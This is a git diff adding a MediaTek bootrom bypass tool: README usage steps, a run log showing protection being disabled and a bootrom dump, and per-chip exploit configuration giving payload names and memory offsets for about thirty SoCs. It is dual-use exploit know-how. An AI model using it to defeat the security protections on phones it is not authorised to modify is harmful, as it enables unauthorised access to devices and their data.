diff --git a/.gitattributes b/.gitattributes index a6344aac8c09253b3b630fb776ae94478aa0275b..33713e6ef57a41e824a315eacd73783f02667c88 100644 --- a/.gitattributes +++ b/.gitattributes @@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text +libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text diff --git a/HOW_TO_USE.txt b/HOW_TO_USE.txt new file mode 100644 index 0000000000000000000000000000000000000000..31eb0da2c31d49c320b4d18c8dffacfc0964f59b --- /dev/null +++ b/HOW_TO_USE.txt @@ -0,0 +1,5 @@ +1. Install python +2. Install UsbDk (64-bit) +3. Run `pip install pyusb==1.1.1 json5` +4. Run `python main.py' +5. Power off device & connect via usb in BROM Mode(https://androidrepairguide.blogspot.com/2025/04/connect-mediatek-device-in-brom-mode.html) \ No newline at end of file diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000000000000000000000000000000000000..53e82be94b1b602bfa3b2ab3bb0449e9c3a02d09 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2021 Dinolek + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000000000000000000000000000000000000..cc32c79889c6c3683e6a416bd706c363eb9f5214 --- /dev/null +++ b/README.md @@ -0,0 +1,52 @@ +# Mediatek Bypass utility + +> Personally tested on `Infinix Hot 10 Play X688B` + +Small utility to disable bootrom protection(sla and daa) on Mediatek devices + +## Usage on Windows + +Skip steps 1-3 after first usage + +1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH") +2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases) +3. Install pyusb, json5 with command: + +``` +pip install pyusb==1.1.1 json5 +``` + +4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end + +``` +python main.py +``` + +5. After that, without disconnecting phone, run SP Flash Tool + +## Usage on Linux + +Skip steps 1-2 after first usage +To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel + +Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels) + +1. Install python +2. Install pyusb, json5 as root with command: + +``` +pip install pyusb json5 +``` + +3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end + +``` +./main.py +``` + +4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode + +## Credits + +- [@chaosmaster](https://github.com/chaosmaster) +- [@xyzz](https://github.com/xyzz) diff --git a/UsbDk_1.0.22_x64.msi b/UsbDk_1.0.22_x64.msi new file mode 100644 index 0000000000000000000000000000000000000000..3f611f21c5e2145f3a2f6484eda7bcb4121f3b06 --- /dev/null +++ b/UsbDk_1.0.22_x64.msi @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5 +size 6348800 diff --git a/bypass_utility.log b/bypass_utility.log new file mode 100644 index 0000000000000000000000000000000000000000..9e4e7fc29108f0794fc0e4bf3d0f84f2615d8872 --- /dev/null +++ b/bypass_utility.log @@ -0,0 +1,258 @@ +[2025-03-30 18:55:40.163719] Waiting for device +[2025-03-30 18:55:52.424270] Found device = 0e8d:0003 +[2025-03-30 18:55:52.650426] Device hw code: 0x766 +[2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00 +[2025-03-30 18:55:52.651427] Device hw version: 0xca00 +[2025-03-30 18:55:52.651427] Device sw version: 0x0 +[2025-03-30 18:55:52.652427] Device secure boot: True +[2025-03-30 18:55:52.653429] Device serial link authorization: False +[2025-03-30 18:55:52.653429] Device download agent authorization: True +[2025-03-30 18:55:52.654428] Disabling watchdog timer +[2025-03-30 18:55:52.656534] Disabling protection +[2025-03-30 18:55:52.684046] Protection disabled +[2025-03-30 18:59:45.675191] Waiting for device +[2025-03-30 19:00:05.607088] Found device = 0e8d:0003 +[2025-03-30 19:00:05.838795] Device hw code: 0x766 +[2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00 +[2025-03-30 19:00:05.839797] Device hw version: 0xca00 +[2025-03-30 19:00:05.840798] Device sw version: 0x0 +[2025-03-30 19:00:05.841799] Device secure boot: True +[2025-03-30 19:00:05.842799] Device serial link authorization: False +[2025-03-30 19:00:05.843798] Device download agent authorization: True +[2025-03-30 19:00:05.844797] Disabling watchdog timer +[2025-03-30 19:00:05.846797] Disabling protection +[2025-03-30 19:00:05.874968] Protection disabled +[2025-03-30 19:06:55.042281] Waiting for device +[2025-03-30 19:07:02.741112] Found device = 0e8d:0003 +[2025-03-30 19:07:02.963512] Device hw code: 0x766 +[2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00 +[2025-03-30 19:07:02.965513] Device hw version: 0xca00 +[2025-03-30 19:07:02.965513] Device sw version: 0x0 +[2025-03-30 19:07:02.966513] Device secure boot: True +[2025-03-30 19:07:02.967514] Device serial link authorization: False +[2025-03-30 19:07:02.967514] Device download agent authorization: True +[2025-03-30 19:07:02.968514] Disabling watchdog timer +[2025-03-30 19:07:02.970879] Disabling protection +[2025-03-30 19:07:02.999589] Protection disabled +[2025-03-30 19:24:07.022011] Waiting for device +[2025-03-30 19:24:45.045941] Found device = 0e8d:0003 +[2025-03-30 19:24:45.292066] Device hw code: 0x766 +[2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00 +[2025-03-30 19:24:45.293068] Device hw version: 0xca00 +[2025-03-30 19:24:45.295068] Device sw version: 0x0 +[2025-03-30 19:24:45.296067] Device secure boot: True +[2025-03-30 19:24:45.296067] Device serial link authorization: False +[2025-03-30 19:24:45.297067] Device download agent authorization: True +[2025-03-30 19:24:45.298068] Disabling watchdog timer +[2025-03-30 19:24:45.300067] Disabling protection +[2025-03-30 19:24:45.331068] Protection disabled +[2025-03-30 14:27:17.677816] Waiting for device +[2025-03-30 14:28:01.724914] Found device = 0e8d:0003 +[2025-03-30 14:28:01.972474] Device hw code: 0x766 +[2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00 +[2025-03-30 14:28:01.973473] Device hw version: 0xca00 +[2025-03-30 14:28:01.973473] Device sw version: 0x0 +[2025-03-30 14:28:01.974474] Device secure boot: True +[2025-03-30 14:28:01.974474] Device serial link authorization: False +[2025-03-30 14:28:01.975473] Device download agent authorization: True +[2025-03-30 14:28:01.976475] Disabling watchdog timer +[2025-03-30 14:28:01.978241] Disabling protection +[2025-03-30 14:28:01.989243] Using kamakiri +[2025-03-30 14:28:01.999445] Protection disabled +[2025-03-30 14:31:17.857838] Waiting for device +[2025-03-30 14:31:26.788119] Found device = 0e8d:0003 +[2025-03-30 14:31:27.015928] Device hw code: 0x766 +[2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00 +[2025-03-30 14:31:27.016928] Device hw version: 0xca00 +[2025-03-30 14:31:27.017929] Device sw version: 0x0 +[2025-03-30 14:31:27.018927] Device secure boot: True +[2025-03-30 14:31:27.018927] Device serial link authorization: False +[2025-03-30 14:31:27.019928] Device download agent authorization: True +[2025-03-30 14:31:27.019928] Disabling watchdog timer +[2025-03-30 14:31:27.021927] Disabling protection +[2025-03-30 14:31:27.022929] Using kamakiri +[2025-03-30 14:31:27.034260] Protection disabled +[2025-03-30 15:00:38.624821] Waiting for device +[2025-03-30 15:00:49.075305] Found device = 0e8d:0003 +[2025-03-30 15:00:49.301589] Device hw code: 0x766 +[2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00 +[2025-03-30 15:00:49.303590] Device hw version: 0xca00 +[2025-03-30 15:00:49.303590] Device sw version: 0x0 +[2025-03-30 15:00:49.304589] Device secure boot: True +[2025-03-30 15:00:49.304589] Device serial link authorization: False +[2025-03-30 15:00:49.305590] Device download agent authorization: True +[2025-03-30 15:00:49.306591] Disabling watchdog timer +[2025-03-30 15:00:49.308590] Disabling protection +[2025-03-30 15:00:49.310590] Using kamakiri +[2025-03-30 15:00:49.321530] Protection disabled +[2025-03-30 15:58:29.967337] Waiting for device +[2025-03-30 15:58:53.410958] Found device = 0e8d:0003 +[2025-03-30 15:58:53.710266] Device hw code: 0x766 +[2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00 +[2025-03-30 15:58:53.711267] Device hw version: 0xca00 +[2025-03-30 15:58:53.712267] Device sw version: 0x0 +[2025-03-30 15:58:53.712267] Device secure boot: True +[2025-03-30 15:58:53.713267] Device serial link authorization: False +[2025-03-30 15:58:53.714266] Device download agent authorization: True +[2025-03-30 15:58:53.715266] Disabling watchdog timer +[2025-03-30 15:58:53.717291] Disabling protection +[2025-03-30 15:58:53.749015] Protection disabled +[2025-03-30 16:03:40.629448] Waiting for device +[2025-03-30 16:03:47.032978] Found device = 0e8d:0003 +[2025-03-30 16:03:47.302838] Device hw code: 0x766 +[2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00 +[2025-03-30 16:03:47.304839] Device hw version: 0xca00 +[2025-03-30 16:03:47.305839] Device sw version: 0x0 +[2025-03-30 16:03:47.306840] Device secure boot: True +[2025-03-30 16:03:47.307842] Device serial link authorization: False +[2025-03-30 16:03:47.308840] Device download agent authorization: True +[2025-03-30 16:03:47.308840] Disabling watchdog timer +[2025-03-30 16:03:47.311839] Disabling protection +[2025-03-30 16:03:47.342886] Protection disabled +[2025-03-30 16:04:19.031387] Waiting for device +[2025-03-30 16:04:36.829544] Found device = 0e8d:0003 +[2025-03-30 16:04:37.098365] Device hw code: 0x766 +[2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00 +[2025-03-30 16:04:37.099366] Device hw version: 0xca00 +[2025-03-30 16:04:37.100366] Device sw version: 0x0 +[2025-03-30 16:04:37.100366] Device secure boot: True +[2025-03-30 16:04:37.101367] Device serial link authorization: False +[2025-03-30 16:04:37.102367] Device download agent authorization: True +[2025-03-30 16:04:37.102367] Disabling watchdog timer +[2025-03-30 16:04:37.105274] Disabling protection +[2025-03-30 16:04:37.177177] Protection disabled +[2025-03-30 16:24:47.810791] Waiting for device +[2025-03-30 16:26:05.907340] Found device = 0e8d:2000 +[2025-03-30 16:26:17.839154] Device hw code: 0x766 +[2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00 +[2025-03-30 16:26:17.840160] Device hw version: 0xca00 +[2025-03-30 16:26:17.841157] Device sw version: 0x0 +[2025-03-30 16:26:17.842157] Device secure boot: True +[2025-03-30 16:26:17.843157] Device serial link authorization: False +[2025-03-30 16:26:17.843157] Device download agent authorization: True +[2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash... +[2025-03-30 16:26:17.847157] status is 7024 +[2025-03-30 16:26:18.854501] Waiting for device +[2025-03-30 16:26:18.856501] Found device = 0e8d:0003 +[2025-03-30 16:26:19.119788] Device hw code: 0x766 +[2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00 +[2025-03-30 16:26:19.121053] Device hw version: 0xca00 +[2025-03-30 16:26:19.122054] Device sw version: 0x0 +[2025-03-30 16:26:19.122054] Device secure boot: True +[2025-03-30 16:26:19.123055] Device serial link authorization: False +[2025-03-30 16:26:19.124054] Device download agent authorization: True +[2025-03-30 16:26:19.124054] Disabling watchdog timer +[2025-03-30 16:26:19.126714] Disabling protection +[2025-03-30 16:26:19.156884] Protection disabled +[2025-03-30 16:28:14.415118] Waiting for device +[2025-03-30 16:28:14.417119] Found device = 0e8d:0003 +[2025-03-30 16:28:14.684816] Device hw code: 0x766 +[2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00 +[2025-03-30 16:28:14.686816] Device hw version: 0xca00 +[2025-03-30 16:28:14.686816] Device sw version: 0x0 +[2025-03-30 16:28:14.687816] Device secure boot: False +[2025-03-30 16:28:14.687816] Device serial link authorization: False +[2025-03-30 16:28:14.688817] Device download agent authorization: False +[2025-03-30 16:28:14.689818] Disabling watchdog timer +[2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da +[2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin +[2025-03-30 16:29:05.907328] Waiting for device +[2025-03-30 16:29:09.219474] Found device = 0e8d:2000 +[2025-03-30 16:29:20.608828] Device hw code: 0x766 +[2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00 +[2025-03-30 16:29:20.610816] Device hw version: 0xca00 +[2025-03-30 16:29:20.610816] Device sw version: 0x0 +[2025-03-30 16:29:20.612815] Device secure boot: True +[2025-03-30 16:29:20.613815] Device serial link authorization: False +[2025-03-30 16:29:20.613815] Device download agent authorization: True +[2025-03-30 16:29:20.614831] Found device in preloader mode, trying to crash... +[2025-03-30 16:29:20.617909] status is 7024 +[2025-03-30 16:29:21.620024] Waiting for device +[2025-03-30 16:29:21.622036] Found device = 0e8d:0003 +[2025-03-30 16:29:21.867785] Device hw code: 0x766 +[2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00 +[2025-03-30 16:29:21.868785] Device hw version: 0xca00 +[2025-03-30 16:29:21.869786] Device sw version: 0x0 +[2025-03-30 16:29:21.869786] Device secure boot: True +[2025-03-30 16:29:21.870786] Device serial link authorization: False +[2025-03-30 16:29:21.871787] Device download agent authorization: True +[2025-03-30 16:29:21.872791] Disabling watchdog timer +[2025-03-30 16:29:21.875154] Disabling protection +[2025-03-30 16:29:21.905106] Protection disabled +[2025-03-30 16:48:01.676685] Waiting for device +[2025-03-30 16:48:01.677686] Found device = 0e8d:2000 +[2025-03-30 16:48:13.037939] Device hw code: 0x766 +[2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00 +[2025-03-30 16:48:13.038942] Device hw version: 0xca00 +[2025-03-30 16:48:13.039941] Device sw version: 0x0 +[2025-03-30 16:48:13.039941] Device secure boot: True +[2025-03-30 16:48:13.040941] Device serial link authorization: False +[2025-03-30 16:48:13.042941] Device download agent authorization: True +[2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash... +[2025-03-30 16:48:13.047942] status is 7024 +[2025-03-30 16:48:14.057950] Waiting for device +[2025-03-30 16:48:14.058950] Found device = 0e8d:0003 +[2025-03-30 16:48:14.320814] Device hw code: 0x766 +[2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00 +[2025-03-30 16:48:14.322814] Device hw version: 0xca00 +[2025-03-30 16:48:14.322814] Device sw version: 0x0 +[2025-03-30 16:48:14.323814] Device secure boot: True +[2025-03-30 16:48:14.325324] Device serial link authorization: False +[2025-03-30 16:48:14.327346] Device download agent authorization: True +[2025-03-30 16:48:14.328346] Disabling watchdog timer +[2025-03-30 16:48:14.330887] Disabling protection +[2025-03-30 16:48:14.363226] Protection disabled +[2025-03-30 16:50:45.192561] Waiting for device +[2025-03-30 16:51:25.446559] Found device = 0e8d:2000 +[2025-03-30 16:51:37.474047] Device hw code: 0x766 +[2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00 +[2025-03-30 16:51:37.476050] Device hw version: 0xca00 +[2025-03-30 16:51:37.477048] Device sw version: 0x0 +[2025-03-30 16:51:37.477048] Device secure boot: True +[2025-03-30 16:51:37.478050] Device serial link authorization: False +[2025-03-30 16:51:37.479049] Device download agent authorization: True +[2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash... +[2025-03-30 16:51:37.482048] status is 7024 +[2025-03-30 16:51:38.490922] Waiting for device +[2025-03-30 16:51:38.492932] Found device = 0e8d:0003 +[2025-03-30 16:51:38.703067] Device hw code: 0x766 +[2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00 +[2025-03-30 16:51:38.704575] Device hw version: 0xca00 +[2025-03-30 16:51:38.706006] Device sw version: 0x0 +[2025-03-30 16:51:38.707006] Device secure boot: True +[2025-03-30 16:51:38.708007] Device serial link authorization: False +[2025-03-30 16:51:38.709010] Device download agent authorization: True +[2025-03-30 16:51:38.709010] Disabling watchdog timer +[2025-03-30 16:51:38.711008] Disabling protection +[2025-03-30 16:51:38.741665] Protection disabled +[2025-03-30 17:29:04.508432] Waiting for device +[2025-03-30 17:29:25.433937] Found device = 0e8d:2000 +[2025-03-30 17:29:36.976516] Device hw code: 0x766 +[2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00 +[2025-03-30 17:29:36.978517] Device hw version: 0xca00 +[2025-03-30 17:29:36.979518] Device sw version: 0x0 +[2025-03-30 17:29:36.982520] Device secure boot: True +[2025-03-30 17:29:36.982520] Device serial link authorization: False +[2025-03-30 17:29:36.983517] Device download agent authorization: True +[2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash... +[2025-03-30 17:29:36.987517] status is 7024 +[2025-03-30 17:29:37.998632] Waiting for device +[2025-03-30 17:29:38.000634] Found device = 0e8d:0003 +[2025-03-30 17:29:38.267953] Device hw code: 0x766 +[2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00 +[2025-03-30 17:29:38.269465] Device hw version: 0xca00 +[2025-03-30 17:29:38.269465] Device sw version: 0x0 +[2025-03-30 17:29:38.271801] Device secure boot: True +[2025-03-30 17:29:38.271801] Device serial link authorization: False +[2025-03-30 17:29:38.272799] Device download agent authorization: True +[2025-03-30 17:29:38.273802] Disabling watchdog timer +[2025-03-30 17:29:38.275799] Disabling protection +[2025-03-30 17:29:38.308307] Protection disabled +[2025-03-31 11:21:37.435686] Waiting for device +[2025-03-31 11:22:51.706012] Waiting for device +[2025-03-31 18:00:48.057530] Waiting for device +[2025-03-31 18:01:03.802597] Found device = 0e8d:2000 +[2025-04-17 14:51:05.202982] Waiting for device +[2025-04-17 14:53:10.254121] Waiting for device +[2025-04-17 14:54:45.863924] Waiting for device +[2025-04-17 14:55:22.032165] Waiting for device diff --git a/default_config.json5 b/default_config.json5 new file mode 100644 index 0000000000000000000000000000000000000000..61ea37b1529f6745d607eae2b0c2aedb0dc24cba --- /dev/null +++ b/default_config.json5 @@ -0,0 +1,216 @@ +{ + "0x6261": { // mt6261 + "payload": "mt6261_payload.bin", + "var_1": 0x28, + "watchdog_address": 0xA0030000, + }, + + "0x6572": { // mt6572 + "payload": "mt6572_payload.bin", + "payload_address": 0x10036A0, + "ptr_usbdl": 0x40ba68, + "ptr_da": 0x40befc, + }, + + "0x6580": { // mt6580 + "payload": "mt6580_payload.bin", + "var_1": 0xAC, + "ptr_usbdl": 0xb60c, + "ptr_da": 0xba94, + }, + + "0x6582": { // mt6582 + "payload": "mt6582_payload.bin", + "ptr_usbdl": 0xa5fc, + "ptr_da": 0xaa84, + }, + + "0x6592": { // mt6592 + "payload": "mt6592_payload.bin", + "ptr_usbdl": 0xa564, + "ptr_da": 0xa9ec, + }, + + "0x6595": { // mt6595 + "payload": "mt6595_payload.bin", + "ptr_usbdl": 0xb218, + "ptr_da": 0xb6a0, + }, + + "0x321": { // mt6735 + "watchdog_address": 0x10212000, + "var_0": 0x10, + "var_1": 0x28, + "payload": "mt6735_payload.bin", + "ptr_usbdl": 0x95f8, + "ptr_da": 0x9a94, + }, + + "0x335": { // mt6737 + "watchdog_address": 0x10212000, + "var_0": 0x10, + "var_1": 0x28, + "payload": "mt6737_payload.bin", + "ptr_usbdl": 0x9608, + "ptr_da": 0x9aa4, + }, + + "0x699": { // mt6739 + "var_0": 0x20, + "var_1": 0xB4, + "payload": "mt6739_payload.bin", + "ptr_usbdl": 0xdf1c, + "ptr_da": 0xe3e8, + }, + + "0x337": { // mt6753 + "watchdog_address": 0x10212000, + "var_1": 0x28, + "payload": "mt6753_payload.bin", + "ptr_usbdl": 0x9668, + "ptr_da": 0x9b04, + }, + + "0x326": { // mt6755 + "payload": "mt6755_payload.bin", + "ptr_usbdl": 0x9a6c, + "ptr_da": 0x9f14, + }, + + "0x551": { // mt6757 + "payload": "mt6757_payload.bin", + "ptr_usbdl": 0x9c2c, + "ptr_da": 0xa0e8, + }, + + "0x717": { // mt6761 + "var_1": 0x25, + "payload": "mt6761_payload.bin", + "ptr_usbdl": 0xbc8c, + "ptr_da": 0xc158, + }, + + "0x690": { // mt6763 + "var_1": 0x7F, + "payload": "mt6763_payload.bin", + "ptr_usbdl": 0xd66c, + "ptr_da": 0xdb38, + }, + + "0x766": { // mt6765 + "var_0": 0x2C, + "var_1": 0x25, + "payload": "mt6765_payload.bin", + "ptr_usbdl": 0xbdc0, + "ptr_da": 0xc28c + }, + + "0x707": { // mt6768 + "var_0": 0x2C, + "var_1": 0x25, + "payload": "mt6768_payload.bin", + "ptr_usbdl": 0xc190, + "ptr_da": 0xc650, + }, + + "0x788": { // mt6771 + "var_0": 0x20, + "payload": "mt6771_payload.bin", + "ptr_usbdl": 0xdebc, + "ptr_da": 0xe388, + }, + + "0x725": { // mt6779 + "payload": "mt6779_payload.bin", + "ptr_usbdl": 0xe04c, + "ptr_da": 0xe50c, + }, + + "0x813": { // mt6785 + "payload": "mt6785_payload.bin", + "ptr_usbdl": 0xe2a4, + "ptr_da": 0xe764, + }, + + "0x6795": { // mt6795 + "payload": "mt6795_payload.bin", + "ptr_usbdl": 0x978c, + "ptr_da": 0x9c28, + }, + + "0x279": { // mt6797 + "payload": "mt6797_payload.bin", + "ptr_usbdl": 0x9eac, + "ptr_da": 0xa354, + }, + + "0x816": { // mt6885 + "payload": "mt6885_payload.bin", + "ptr_usbdl": 0xe6b8, + "ptr_da": 0xebbc, + }, + + "0x8127": { // mt8127 + "payload": "mt8127_payload.bin", + "ptr_usbdl": 0xb2b8, + "ptr_da": 0xb740, + }, + + "0x8163": { // mt8163 + "var_1": 0xB1, + "payload": "mt8163_payload.bin", + "ptr_usbdl": 0xc12c, + "ptr_da": 0xc5c8, + }, + + "0x8167": { // mt8516 + "var_1": 0xCC, + "payload": "mt8167_payload.bin", + "ptr_usbdl": 0xd2e4, + "ptr_da": 0xd7ac, + }, + + "0x8172": { // mt8173 + "payload": "mt8173_payload.bin", + "payload_address": 0x120A00, + "ptr_usbdl": 0xa0e4, + "ptr_da": 0xa580, + }, + + "0x8695": { // mt8695 + "payload": "mt8695_payload.bin", + "ptr_usbdl": 0xbeec, + "ptr_da": 0xc3f8, + }, + + "0x886": { // mt6873 + "payload": "mt6873_payload.bin", + "ptr_usbdl": 0xea78, + "ptr_da": 0xef38, + }, + + "0x562": { // mt6799 + "watchdog_address": 0x10211000, + "payload": "mt6799_payload.bin", + "ptr_usbdl": 0xf5ac, + "ptr_da": 0xfa78, + }, + + "0x989": { // mt6833 + "payload": "mt6833_payload.bin", + "ptr_usbdl": 0xdfe0, + "ptr_da": 0xe4a0, + }, + + "0x996": { // mt6853 + "payload": "mt6853_payload.bin", + "ptr_usbdl": 0xea64, + "ptr_da": 0xef24, + }, + + "0x8590": { // mt8590 + "payload": "mt8590_payload.bin", + "ptr_usbdl": 0xbbe4, + "ptr_da": 0xc06c, + }, +} diff --git a/exploits_collection/README.md b/exploits_collection/README.md new file mode 100644 index 0000000000000000000000000000000000000000..48a7a0a9acc5d2d46b391ca64451bb9e162abef1 --- /dev/null +++ b/exploits_collection/README.md @@ -0,0 +1,34 @@ +### Supported SoCs +- mt6261 +- mt6572 +- mt6580 +- mt6582 +- mt6592 +- mt6595 +- mt6735 +- mt6737 +- mt6739 +- mt6750 +- mt6753 +- mt6755 +- mt6757 +- mt6761 +- mt6763 +- mt6765 +- mt6768 +- mt6771 +- mt6779 +- mt6785 +- mt6795 +- mt6797 +- mt6799 +- mt6833 +- mt6853 +- mt6873 +- mt6885 +- mt8127 +- mt8163 +- mt8167 +- mt8173 +- mt8590 +- mt8695 diff --git a/exploits_collection/default_config.json5 b/exploits_collection/default_config.json5 new file mode 100644 index 0000000000000000000000000000000000000000..61ea37b1529f6745d607eae2b0c2aedb0dc24cba --- /dev/null +++ b/exploits_collection/default_config.json5 @@ -0,0 +1,216 @@ +{ + "0x6261": { // mt6261 + "payload": "mt6261_payload.bin", + "var_1": 0x28, + "watchdog_address": 0xA0030000, + }, + + "0x6572": { // mt6572 + "payload": "mt6572_payload.bin", + "payload_address": 0x10036A0, + "ptr_usbdl": 0x40ba68, + "ptr_da": 0x40befc, + }, + + "0x6580": { // mt6580 + "payload": "mt6580_payload.bin", + "var_1": 0xAC, + "ptr_usbdl": 0xb60c, + "ptr_da": 0xba94, + }, + + "0x6582": { // mt6582 + "payload": "mt6582_payload.bin", + "ptr_usbdl": 0xa5fc, + "ptr_da": 0xaa84, + }, + + "0x6592": { // mt6592 + "payload": "mt6592_payload.bin", + "ptr_usbdl": 0xa564, + "ptr_da": 0xa9ec, + }, + + "0x6595": { // mt6595 + "payload": "mt6595_payload.bin", + "ptr_usbdl": 0xb218, + "ptr_da": 0xb6a0, + }, + + "0x321": { // mt6735 + "watchdog_address": 0x10212000, + "var_0": 0x10, + "var_1": 0x28, + "payload": "mt6735_payload.bin", + "ptr_usbdl": 0x95f8, + "ptr_da": 0x9a94, + }, + + "0x335": { // mt6737 + "watchdog_address": 0x10212000, + "var_0": 0x10, + "var_1": 0x28, + "payload": "mt6737_payload.bin", + "ptr_usbdl": 0x9608, + "ptr_da": 0x9aa4, + }, + + "0x699": { // mt6739 + "var_0": 0x20, + "var_1": 0xB4, + "payload": "mt6739_payload.bin", + "ptr_usbdl": 0xdf1c, + "ptr_da": 0xe3e8, + }, + + "0x337": { // mt6753 + "watchdog_address": 0x10212000, + "var_1": 0x28, + "payload": "mt6753_payload.bin", + "ptr_usbdl": 0x9668, + "ptr_da": 0x9b04, + }, + + "0x326": { // mt6755 + "payload": "mt6755_payload.bin", + "ptr_usbdl": 0x9a6c, + "ptr_da": 0x9f14, + }, + + "0x551": { // mt6757 + "payload": "mt6757_payload.bin", + "ptr_usbdl": 0x9c2c, + "ptr_da": 0xa0e8, + }, + + "0x717": { // mt6761 + "var_1": 0x25, + "payload": "mt6761_payload.bin", + "ptr_usbdl": 0xbc8c, + "ptr_da": 0xc158, + }, + + "0x690": { // mt6763 + "var_1": 0x7F, + "payload": "mt6763_payload.bin", + "ptr_usbdl": 0xd66c, + "ptr_da": 0xdb38, + }, + + "0x766": { // mt6765 + "var_0": 0x2C, + "var_1": 0x25, + "payload": "mt6765_payload.bin", + "ptr_usbdl": 0xbdc0, + "ptr_da": 0xc28c + }, + + "0x707": { // mt6768 + "var_0": 0x2C, + "var_1": 0x25, + "payload": "mt6768_payload.bin", + "ptr_usbdl": 0xc190, + "ptr_da": 0xc650, + }, + + "0x788": { // mt6771 + "var_0": 0x20, + "payload": "mt6771_payload.bin", + "ptr_usbdl": 0xdebc, + "ptr_da": 0xe388, + }, + + "0x725": { // mt6779 + "payload": "mt6779_payload.bin", + "ptr_usbdl": 0xe04c, + "ptr_da": 0xe50c, + }, + + "0x813": { // mt6785 + "payload": "mt6785_payload.bin", + "ptr_usbdl": 0xe2a4, + "ptr_da": 0xe764, + }, + + "0x6795": { // mt6795 + "payload": "mt6795_payload.bin", + "ptr_usbdl": 0x978c, + "ptr_da": 0x9c28, + }, + + "0x279": { // mt6797 + "payload": "mt6797_payload.bin", + "ptr_usbdl": 0x9eac, + "ptr_da": 0xa354, + }, + + "0x816": { // mt6885 + "payload": "mt6885_payload.bin", + "ptr_usbdl": 0xe6b8, + "ptr_da": 0xebbc, + }, + + "0x8127": { // mt8127 + "payload": "mt8127_payload.bin", + "ptr_usbdl": 0xb2b8, + "ptr_da": 0xb740, + }, + + "0x8163": { // mt8163 + "var_1": 0xB1, + "payload": "mt8163_payload.bin", + "ptr_usbdl": 0xc12c, + "ptr_da": 0xc5c8, + }, + + "0x8167": { // mt8516 + "var_1": 0xCC, + "payload": "mt8167_payload.bin", + "ptr_usbdl": 0xd2e4, + "ptr_da": 0xd7ac, + }, + + "0x8172": { // mt8173 + "payload": "mt8173_payload.bin", + "payload_address": 0x120A00, + "ptr_usbdl": 0xa0e4, + "ptr_da": 0xa580, + }, + + "0x8695": { // mt8695 + "payload": "mt8695_payload.bin", + "ptr_usbdl": 0xbeec, + "ptr_da": 0xc3f8, + }, + + "0x886": { // mt6873 + "payload": "mt6873_payload.bin", + "ptr_usbdl": 0xea78, + "ptr_da": 0xef38, + }, + + "0x562": { // mt6799 + "watchdog_address": 0x10211000, + "payload": "mt6799_payload.bin", + "ptr_usbdl": 0xf5ac, + "ptr_da": 0xfa78, + }, + + "0x989": { // mt6833 + "payload": "mt6833_payload.bin", + "ptr_usbdl": 0xdfe0, + "ptr_da": 0xe4a0, + }, + + "0x996": { // mt6853 + "payload": "mt6853_payload.bin", + "ptr_usbdl": 0xea64, + "ptr_da": 0xef24, + }, + + "0x8590": { // mt8590 + "payload": "mt8590_payload.bin", + "ptr_usbdl": 0xbbe4, + "ptr_da": 0xc06c, + }, +} diff --git a/exploits_collection/payloads/generic_dump_payload.bin b/exploits_collection/payloads/generic_dump_payload.bin new file mode 100644 index 